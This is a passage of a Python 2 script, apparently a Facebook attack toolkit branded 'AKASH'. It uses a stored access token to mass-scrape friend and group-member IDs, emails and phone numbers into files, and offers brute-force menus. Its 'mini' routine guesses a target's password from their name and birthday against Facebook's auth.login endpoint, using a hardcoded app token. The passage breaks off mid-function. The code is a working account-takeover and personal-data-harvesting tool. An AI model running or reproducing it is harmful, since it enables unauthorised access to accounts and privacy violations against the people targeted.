cuih = raw_input("\033[1;97m╚═\033[1;91mAKASH>>> \033[1;97m")
if cuih =="":
print "\033[1;91m[!] Wrong input"
dump_pilih()
elif cuih =="1":
id_teman()
elif cuih =="2":
idfrom_teman()
elif cuih =="3":
id_member_grup()
elif cuih =="4":
em_member_grup()
elif cuih =="5":
no_member_grup()
elif cuih =="6":
email()
elif cuih =="7":
emailfrom_teman()
elif cuih =="8":
nomor_hp()
elif cuih =="9":
hpfrom_teman()
elif cuih =="0":
menu()
else:
print "\033[1;91m[!] Wrong input"
dump_pilih()
##### ID TEMAN #####
def id_teman():
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(0.01)
login()
try:
os.mkdir('out')
except OSError:
pass
try:
os.system('reset')
print logo
r=requests.get("https://graph.facebook.com/me/friends?access_token="+toket)
z=json.loads(r.text)
jalan('\033[1;91m[AKASH] \033[1;92mGet all friend id \033[1;97m...')
print 42*"\033[1;97m═"
bz = open('out/id_teman.txt','w')
for a in z['data']:
idteman.append(a['id'])
bz.write(a['id'] + '\n')
print ("\r\033[1;97m[ \033[1;92m"+str(len(idteman))+"\033[1;97m ]\033[1;97m=> \033[1;97m"+a['id']),;sys.stdout.flush();time.sleep(0.0001)
bz.close()
print '\r\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mSuccessfully get id \033[1;97m....'
print"\r\033[1;91m[+] \033[1;92mTotal ID \033[1;91m: \033[1;97m%s"%(len(idteman))
done = raw_input("\r\033[1;91m[+] \033[1;92mSave file with name\033[1;91m :\033[1;97m ")
os.rename('out/id_teman.txt','out/'+done)
print("\r\033[1;91m[+] \033[1;92mFile saved \033[1;91m: \033[1;97mout/"+done)
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except IOError:
print"\033[1;91m[!] Error creating file"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except (KeyboardInterrupt,EOFError):
print("\033[1;91m[!] Stopped")
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except KeyError:
print('\033[1;91m[!] Error')
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except requests.exceptions.ConnectionError:
print"\033[1;91m[✖] No connection"
keluar()
##### ID FROM TEMAN #####
def idfrom_teman():
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(0.01)
login()
try:
os.mkdir('out')
except OSError:
pass
try:
os.system('reset')
print logo
idt = raw_input("\033[1;91m[+] \033[1;92mInput ID friend \033[1;91m: \033[1;97m")
try:
jok = requests.get("https://graph.facebook.com/"+idt+"?access_token="+toket)
op = json.loads(jok.text)
print"\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mFrom\033[1;91m :\033[1;97m "+op["name"]
except KeyError:
print"\033[1;91m[!] Friend not found"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
r=requests.get("https://graph.facebook.com/"+idt+"?fields=friends.limit(50000)&access_token="+toket)
z=json.loads(r.text)
jalan('\033[1;91m[✺] \033[1;92mGet all friend id from friend \033[1;97m...')
print 42*"\033[1;97m═"
bz = open('out/id_teman_from_teman.txt','w')
for a in z['friends']['data']:
idfromteman.append(a['id'])
bz.write(a['id'] + '\n')
print ("\r\033[1;97m[ \033[1;92m"+str(len(idfromteman))+"\033[1;97m ]\033[1;97m=> \033[1;97m"+a['id']),;sys.stdout.flush();time.sleep(0.0001)
bz.close()
print '\r\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mSuccessfully get id \033[1;97m....'
print"\r\033[1;91m[+] \033[1;92mTotal ID \033[1;91m: \033[1;97m%s"%(len(idfromteman))
done = raw_input("\r\033[1;91m[+] \033[1;92mSave file with name\033[1;91m :\033[1;97m ")
os.rename('out/id_teman_from_teman.txt','out/'+done)
print("\r\033[1;91m[+] \033[1;92mFile saved \033[1;91m: \033[1;97mout/"+done)
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except IOError:
print"\033[1;91m[!] Error creating file"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except (KeyboardInterrupt,EOFError):
print("\033[1;91m[!] Stopped")
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except KeyError:
print('\033[1;91m[!] Error')
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except requests.exceptions.ConnectionError:
print"\033[1;91m[✖] No connection"
keluar()
##### ID FROM MEMBER GRUP #####
def id_member_grup():
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(0.01)
login()
try:
os.mkdir('out')
except OSError:
pass
try:
os.system('reset')
print logo
id=raw_input('\033[1;91m[+] \033[1;92mInput ID group \033[1;91m:\033[1;97m ')
try:
r=requests.get('https://graph.facebook.com/group/?id='+id+'&access_token='+toket)
asw=json.loads(r.text)
print"\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mFrom group \033[1;91m:\033[1;97m "+asw['name']
except KeyError:
print"\033[1;91m[!] Group not found"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
jalan('\033[1;91m[AKASH] \033[1;92mGet group member id \033[1;97m...')
print 42*"\033[1;97m═"
bz = open('out/member_grup.txt','w')
re=requests.get('https://graph.facebook.com/'+id+'/members?fields=name,id&limit=999999999999&access_token='+toket)
s=json.loads(re.text)
for a in s['data']:
idmem.append(a['id'])
bz.write(a['id'] + '\n')
print ("\r\033[1;97m[ \033[1;92m"+str(len(idmem))+"\033[1;97m ]\033[1;97m=> \033[1;97m"+a['id']),;sys.stdout.flush();time.sleep(0.0001)
bz.close()
print '\r\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mSuccessfully get id \033[1;97m....'
print"\r\033[1;91m[+] \033[1;92mTotal ID \033[1;91m: \033[1;97m%s"%(len(idmem))
done = raw_input("\r\033[1;91m[+] \033[1;92mSave file with name\033[1;91m :\033[1;97m ")
os.rename('out/member_grup.txt','out/'+done)
print("\r\033[1;91m[+] \033[1;92mFile saved \033[1;91m: \033[1;97mout/"+done)
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except IOError:
print"\033[1;91m[!] Error creating file"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except (KeyboardInterrupt,EOFError):
print("\033[1;91m[!] Stopped")
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except KeyError:
print('\033[1;91m[!] Error')
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except requests.exceptions.ConnectionError:
print"\033[1;91m[✖] No connection"
keluar()
##### EMAIL FROM GRUP #####
def em_member_grup():
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(0.01)
login()
try:
os.mkdir('out')
except OSError:
pass
try:
os.system('reset')
print logo
id=raw_input('\033[1;91m[+] \033[1;92mInput ID group \033[1;91m:\033[1;97m ')
try:
r=requests.get('https://graph.facebook.com/group/?id='+id+'&access_token='+toket)
asw=json.loads(r.text)
print"\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mFrom group \033[1;91m:\033[1;97m "+asw['name']
except KeyError:
print"\033[1;91m[!] Group not found"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
jalan('\033[1;91m[AKASH] \033[1;92mGet group member email \033[1;97m...')
print 42*"\033[1;97m═"
bz = open('out/em_member_grup.txt','w')
re=requests.get('https://graph.facebook.com/'+id+'/members?fields=name,id&limit=999999999&access_token='+toket)
s=json.loads(re.text)
for a in s['data']:
x = requests.get("https://graph.facebook.com/"+a['id']+"?access_token="+toket)
z = json.loads(x.text)
try:
emmem.append(z['email'])
bz.write(z['email'] + '\n')
print ("\r\033[1;97m[ \033[1;92m"+str(len(emmem))+"\033[1;97m ]\033[1;97m=> \033[1;97m"+z['email']+" | "+z['name']+"\n"),;sys.stdout.flush();time.sleep(0.0001)
except KeyError:
pass
bz.close()
print 42*"\033[1;97m═"
print '\r\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mSuccessfully get email from member group \033[1;97m....'
print"\r\033[1;91m[+] \033[1;92mTotal Email \033[1;91m: \033[1;97m%s"%(len(emmem))
done = raw_input("\r\033[1;91m[+] \033[1;92mSave file with name\033[1;91m :\033[1;97m ")
os.rename('out/em_member_grup.txt','out/'+done)
print("\r\033[1;91m[+] \033[1;92mFile saved \033[1;91m: \033[1;97mout/"+done)
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except IOError:
print"\033[1;91m[!] Error creating file"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except (KeyboardInterrupt,EOFError):
print("\033[1;91m[!] Stopped")
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except KeyError:
print('\033[1;91m[!] Error')
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except requests.exceptions.ConnectionError:
print"\033[1;91m[✖] No connection"
keluar()
##### NUMBER FROM GRUP #####
def no_member_grup():
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(0.01)
login()
try:
os.mkdir('out')
except OSError:
pass
try:
os.system('reset')
print logo
id=raw_input('\033[1;91m[+] \033[1;92mInput ID group \033[1;91m:\033[1;97m ')
try:
r=requests.get('https://graph.facebook.com/group/?id='+id+'&access_token='+toket)
asw=json.loads(r.text)
print"\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mFrom group \033[1;91m:\033[1;97m "+asw['name']
except KeyError:
print"\033[1;91m[!] Group not found"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
jalan('\033[1;91m[AKASH] \033[1;92mGet group member phone number \033[1;97m...')
print 42*"\033[1;97m═"
bz = open('out/no_member_grup.txt','w')
re=requests.get('https://graph.facebook.com/'+id+'/members?fields=name,id&limit=999999999&access_token='+toket)
s=json.loads(re.text)
for a in s['data']:
x = requests.get("https://graph.facebook.com/"+a['id']+"?access_token="+toket)
z = json.loads(x.text)
try:
nomem.append(z['mobile_phone'])
bz.write(z['mobile_phone'] + '\n')
print ("\r\033[1;97m[ \033[1;92m"+str(len(nomem))+"\033[1;97m ]\033[1;97m=> \033[1;97m"+z['mobile_phone']+" | "+z['name']+"\n"),;sys.stdout.flush();time.sleep(0.0001)
except KeyError:
pass
bz.close()
print 42*"\033[1;97m═"
print '\r\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mSuccessfully get phone number from member group \033[1;97m....'
print"\r\033[1;91m[+] \033[1;92mTotal Number \033[1;91m: \033[1;97m%s"%(len(nomem))
done = raw_input("\r\033[1;91m[+] \033[1;92mSave file with name\033[1;91m :\033[1;97m ")
os.rename('out/no_member_grup.txt','out/'+done)
print("\r\033[1;91m[+] \033[1;92mFile saved \033[1;91m: \033[1;97mout/"+done)
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except IOError:
print"\033[1;91m[!] Error creating file"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except (KeyboardInterrupt,EOFError):
print("\033[1;91m[!] Stopped")
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except KeyError:
print('\033[1;91m[!] Error')
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except requests.exceptions.ConnectionError:
print"\033[1;91m[✖] No connection"
keluar()
##### EMAIL #####
def email():
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(0.01)
login()
try:
os.mkdir('out')
except OSError:
pass
try:
os.system('reset')
print logo
r = requests.get('https://graph.facebook.com/me/friends?access_token='+toket)
a = json.loads(r.text)
jalan('\033[1;91m[AKASH] \033[1;92mGet all friend email \033[1;97m...')
print 42*"\033[1;97m═"
bz = open('out/email_teman.txt','w')
for i in a['data']:
x = requests.get("https://graph.facebook.com/"+i['id']+"?access_token="+toket)
z = json.loads(x.text)
try:
em.append(z['email'])
bz.write(z['email'] + '\n')
print ("\r\033[1;97m[ \033[1;92m"+str(len(em))+"\033[1;97m ]\033[1;97m=> \033[1;97m"+z['email']+" | "+z['name']+"\n"),;sys.stdout.flush();time.sleep(0.0001)
except KeyError:
pass
bz.close()
print 42*"\033[1;97m═"
print '\r\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mSuccessfully get email \033[1;97m....'
print"\r\033[1;91m[+] \033[1;92mTotal Email \033[1;91m: \033[1;97m%s"%(len(em))
done = raw_input("\r\033[1;91m[+] \033[1;92mSave file with name\033[1;91m :\033[1;97m ")
os.rename('out/email_teman.txt','out/'+done)
print("\r\033[1;91m[+] \033[1;92mFile saved \033[1;91m: \033[1;97mout/"+done)
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except IOError:
print"\033[1;91m[!] Error creating file"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except (KeyboardInterrupt,EOFError):
print("\033[1;91m[!] Stopped")
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except KeyError:
print('\033[1;91m[!] Error')
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except requests.exceptions.ConnectionError:
print"\033[1;91m[✖] No connection"
keluar()
##### EMAIL FROM TEMAN #####
def emailfrom_teman():
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(0.01)
login()
try:
os.mkdir('out')
except OSError:
pass
try:
os.system('reset')
print logo
idt = raw_input("\033[1;91m[+] \033[1;92mInput ID friend \033[1;91m: \033[1;97m")
try:
jok = requests.get("https://graph.facebook.com/"+idt+"?access_token="+toket)
op = json.loads(jok.text)
print"\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mFrom\033[1;91m :\033[1;97m "+op["name"]
except KeyError:
print"\033[1;91m[!] Friend not found"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
r = requests.get('https://graph.facebook.com/'+idt+'/friends?access_token='+toket)
a = json.loads(r.text)
jalan('\033[1;91m[AKASH] \033[1;92mGet all friend email from friend \033[1;97m...')
print 42*"\033[1;97m═"
bz = open('out/em_teman_from_teman.txt','w')
for i in a['data']:
x = requests.get("https://graph.facebook.com/"+i['id']+"?access_token="+toket)
z = json.loads(x.text)
try:
emfromteman.append(z['email'])
bz.write(z['email'] + '\n')
print ("\r\033[1;97m[ \033[1;92m"+str(len(emfromteman))+"\033[1;97m ]\033[1;97m=> \033[1;97m"+z['email']+" | "+z['name']+"\n"),;sys.stdout.flush();time.sleep(0.0001)
except KeyError:
pass
bz.close()
print 42*"\033[1;97m═"
print '\r\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mSuccessfully get email \033[1;97m....'
print"\r\033[1;91m[+] \033[1;92mTotal Email \033[1;91m: \033[1;97m%s"%(len(emfromteman))
done = raw_input("\r\033[1;91m[+] \033[1;92mSave file with name\033[1;91m :\033[1;97m ")
os.rename('out/em_teman_from_teman.txt','out/'+done)
print("\r\033[1;91m[+] \033[1;92mFile saved \033[1;91m: \033[1;97mout/"+done)
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except IOError:
print"\033[1;91m[!] Error creating file"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except (KeyboardInterrupt,EOFError):
print("\033[1;91m[!] Stopped")
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except KeyError:
print('\033[1;91m[!] Error')
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except requests.exceptions.ConnectionError:
print"\033[1;91m[✖] No connection"
keluar()
##### NOMER #####
def nomor_hp():
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(0.01)
login()
try:
os.mkdir('out')
except OSError:
pass
try:
os.system('reset')
print logo
jalan('\033[1;91m[AKASH] \033[1;92mGet all friend number phone \033[1;97m...')
print 42*"\033[1;97m═"
url= "https://graph.facebook.com/me/friends?access_token="+toket
r =requests.get(url)
z=json.loads(r.text)
bz = open('out/nomer_teman.txt','w')
for n in z["data"]:
x = requests.get("https://graph.facebook.com/"+n['id']+"?access_token="+toket)
z = json.loads(x.text)
try:
hp.append(z['mobile_phone'])
bz.write(z['mobile_phone'] + '\n')
print ("\r\033[1;97m[ \033[1;92m"+str(len(hp))+"\033[1;97m ]\033[1;97m=> \033[1;97m"+z['mobile_phone']+" | "+z['name']+"\n"),;sys.stdout.flush();time.sleep(0.0001)
except KeyError:
pass
bz.close()
print 42*"\033[1;97m═"
print '\r\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mSuccessfully get number \033[1;97m....'
print"\r\033[1;91m[+] \033[1;92mTotal Number \033[1;91m: \033[1;97m%s"%(len(hp))
done = raw_input("\r\033[1;91m[+] \033[1;92mSave file with name\033[1;91m :\033[1;97m ")
os.rename('out/nomer_teman.txt','out/'+done)
print("\r\033[1;91m[+] \033[1;92mFile saved \033[1;91m: \033[1;97mout/"+done)
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except IOError:
print"\033[1;91m[!] Error creating file"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except (KeyboardInterrupt,EOFError):
print("\033[1;91m[!] Stopped")
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except KeyError:
print('\033[1;91m[!] Error')
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except requests.exceptions.ConnectionError:
print"\033[1;91m[✖] No connection"
keluar()
##### NOMER FROM TEMAN #####
def hpfrom_teman():
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(0.01)
login()
try:
os.mkdir('out')
except OSError:
pass
try:
os.system('reset')
print logo
idt = raw_input("\033[1;91m[+] \033[1;92mInput ID friend \033[1;91m: \033[1;97m")
try:
jok = requests.get("https://graph.facebook.com/"+idt+"?access_token="+toket)
op = json.loads(jok.text)
print"\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mFrom\033[1;91m :\033[1;97m "+op["name"]
except KeyError:
print"\033[1;91m[!] Friend not found"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
r = requests.get('https://graph.facebook.com/'+idt+'/friends?access_token='+toket)
a = json.loads(r.text)
jalan('\033[1;91m[AKASH] \033[1;92mGet all friend number from friend \033[1;97m...')
print 42*"\033[1;97m═"
bz = open('out/no_teman_from_teman.txt','w')
for i in a['data']:
x = requests.get("https://graph.facebook.com/"+i['id']+"?access_token="+toket)
z = json.loads(x.text)
try:
hpfromteman.append(z['mobile_phone'])
bz.write(z['mobile_phone'] + '\n')
print ("\r\033[1;97m[ \033[1;92m"+str(len(hpfromteman))+"\033[1;97m ]\033[1;97m=> \033[1;97m"+z['mobile_phone']+" | "+z['name']+"\n"),;sys.stdout.flush();time.sleep(0.0001)
except KeyError:
pass
bz.close()
print 42*"\033[1;97m═"
print '\r\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mSuccessfully get number \033[1;97m....'
print"\r\033[1;91m[+] \033[1;92mTotal Number \033[1;91m: \033[1;97m%s"%(len(hpfromteman))
done = raw_input("\r\033[1;91m[+] \033[1;92mSave file with name\033[1;91m :\033[1;97m ")
os.rename('out/no_teman_from_teman.txt','out/'+done)
print("\r\033[1;91m[+] \033[1;92mFile saved \033[1;91m: \033[1;97mout/"+done)
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except IOError:
print"\033[1;91m[!] Error creating file"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except (KeyboardInterrupt,EOFError):
print("\033[1;91m[!] Stopped")
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except KeyError:
print('\033[1;91m[!] Error')
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except requests.exceptions.ConnectionError:
print"\033[1;91m[✖] No connection"
keluar()
##### MENU HACK #####
def menu_hack():
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(0.01)
login()
os.system('reset')
print logo
print "\033[1;97m║AKASH--\033[1;91m> \033[1;92m1.\033[1;97m Mini Hack Facebook(\033[1;92mTarget\033[1;97m)"
print "\033[1;97m║AKASH--\033[1;91m> \033[1;92m2.\033[1;97m Multi Bruteforce Facebook"
print "\033[1;97m║AKASH--\033[1;91m> \033[1;92m3.\033[1;97m Super Multi Bruteforce Facebook"
print "\033[1;97m║AKASH--\033[1;91m> \033[1;92m4.\033[1;97m BruteForce(\033[1;92mTarget\033[1;97m)"
print "\033[1;97m║AKASH--\033[1;91m> \033[1;92m5.\033[1;97m Yahoo Checker"
print "\033[1;97m║AKASH--\033[1;91m> \033[1;91m0.\033[1;97m Back"
print "║"
hack_pilih()
#----pilih
def hack_pilih():
hack = raw_input("\033[1;97m╚═\033[1;91mAKASH>>> \033[1;97m")
if hack=="":
print "\033[1;91m[!] Wrong input"
hack_pilih()
elif hack =="1":
mini()
elif hack =="2":
crack()
hasil()
elif hack =="3":
super()
elif hack =="4":
brute()
elif hack =="5":
menu_yahoo()
elif hack =="0":
menu()
else:
print "\033[1;91m[!] Wrong input"
hack_pilih()
##### MINI HF #####
def mini():
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(0.01)
login()
os.system('reset')
print logo
print "\033[1;97m[\033[1;91mINFO\033[1;97m] \033[1;91mThe target account must be friends\number with your account first!"
print 42*"\033[1;97m═"
try:
id = raw_input("\033[1;91m[+] \033[1;92mTarget ID \033[1;91m:\033[1;97m ")
jalan('\033[1;91m[AKASH] \033[1;92mWait a minute \033[1;97m...')
r = requests.get("https://graph.facebook.com/"+id+"?access_token="+toket)
a = json.loads(r.text)
print '\033[1;91m[AKASH] \033[1;92mName\033[1;97m : '+a['name']
jalan('\033[1;91m[+] \033[1;92mCheck \033[1;97m...')
time.sleep(2)
jalan('\033[1;91m[+] \033[1;92mOpen password \033[1;97m...')
time.sleep(2)
print 42*"\033[1;97m═"
pz1 = a['first_name']+'123'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(id)+"&locale=en_US&password="+(pz1)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
y = json.load(data)
if 'access_token' in y:
print "\033[1;91m[+] \033[1;92mFound"
print "\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mName\033[1;97m : "+a['name']
print "\033[1;91m[AKASH] \033[1;92mUsername\033[1;97m : "+id
print "\033[1;91m[AKASH] \033[1;92mPassword\033[1;97m : "+pz1
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_hack()
else:
if 'www.facebook.com' in y["error_msg"]:
print "\033[1;91m[+] \033[1;92mFound"
print "\033[1;91m[!] \033[1;93mAccount Checkpoint"
print "\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mName\033[1;97m : "+a['name']
print "\033[1;91m[AKASH] \033[1;92mUsername\033[1;97m : "+id
print "\033[1;91m[AKASH] \033[1;92mPassword\033[1;97m : "+pz1
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_hack()
else:
pz2 = a['first_name'] + '12345'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(id)+"&locale=en_US&password="+(pz2)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
y = json.load(data)
if 'access_token' in y:
print "\033[1;91m[+] \033[1;92mFound"
print "\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mName\033[1;97m : "+a['name']
print "\033[1;91m[AKASH] \033[1;92mUsername\033[1;97m : "+id
print "\033[1;91m[AKASH] \033[1;92mPassword\033[1;97m : "+pz2
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_hack()
else:
if 'www.facebook.com' in y["error_msg"]:
print "\033[1;91m[+] \033[1;92mFound"
print "\033[1;91m[!] \033[1;93mAccount Checkpoint"
print "\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mName\033[1;97m : "+a['name']
print "\033[1;91m[AKASH] \033[1;92mUsername\033[1;97m : "+id
print "\033[1;91m[AKASH] \033[1;92mPassword\033[1;97m : "+pz2
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_hack()
else:
pz3 = a['last_name'] + '123'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(id)+"&locale=en_US&password="+(pz3)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
y = json.load(data)
if 'access_token' in y:
print "\033[1;91m[+] \033[1;92mFound"
print "\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mName\033[1;97m : "+a['name']
print "\033[1;91m[AKASH] \033[1;92mUsername\033[1;97m : "+id
print "\033[1;91m[AKASH] \033[1;92mPassword\033[1;97m : "+pz3
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_hack()
else:
if 'www.facebook.com' in y["error_msg"]:
print "\033[1;91m[+] \033[1;92mFound"
print "\033[1;91m[!] \033[1;93mAccount Checkpoint"
print "\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mName\033[1;97m : "+a['name']
print "\033[1;91m[AKASH] \033[1;92mUsername\033[1;97m : "+id
print "\033[1;91m[AKASH] \033[1;92mPassword\033[1;97m : "+pz3
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_hack()
else:
lahir = a['birthday']
pz4 = lahir.replace('/', '')
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(id)+"&locale=en_US&password="+(pz4)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
y = json.load(data)
if 'access_token' in y:
print "\033[1;91m[+] \033[1;92mFound"
print "\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mName\033[1;97m : "+a['name']
print "\033[1;91m[AKASH] \033[1;92mUsername\033[1;97m : "+id
print "\033[1;91m[AKASH] \033[1;92mPassword\033[1;97m : "+pz4
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_hack()
else:
if 'www.facebook.com' in y["error_msg"]:
print "\033[1;91m[+] \033[1;92mFound"
print "\033[1;91m[!] \033[1;93mAccount Checkpoint"
print "\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mName\033[1;97m : "+a['name']
print "\033[1;91m[AKASH] \033[1;92mUsername\033[1;97m : "+id
print "\033[1;91m[AKASH] \033[1;92mPassword\033[1;97m : "+pz4
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_hack()
else:
lahirs = a['birthday']
gaz = lahirs.replace('/', '')
pz5 = a['first_name']+'786'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(id)+"&locale=en_US&password="+(pz5)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
y = json.load(data)
if 'access_token' in y:
print "\033[1;91m[+] \033[1;92mFound"
print "\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mName\033[1;97m : "+a['name']
print "\033[1;91m[AKASH] \033[1;92mUsername\033[1;97m : "+id
print "\033[1;91m[AKASH] \033[1;92mPassword\033[1;97m : "+pz5
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_hack()
else:
if 'www.facebook.com' in y["error_msg"]:
print "\033[1;91m[+] \033[1;92mFound"
print "\033[1;91m[!] \033[1;93mAccount Checkpoint"
print "\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mName\033[1;97m : "+a['name']
print "\033[1;91m[AKASH] \033[1;92mUsername\033[1;97m : "+id
print "\033[1;91m[AKASH] \033[1;92mPassword\033[1;97m : "+pz5
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_hack()
else:
pz6 = "Pakistan"
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(id)+"&locale=en_US&password="+(pz6)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
y = json.load(data)
if 'access_token' in y:
print "\033[1;91m[+] \033[1;92mFound"
print "\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mName\033[1;97m : "+a['name']
print "\033[1;91m[AKASH] \033[1;92mUsername\033[1;97m : "+id
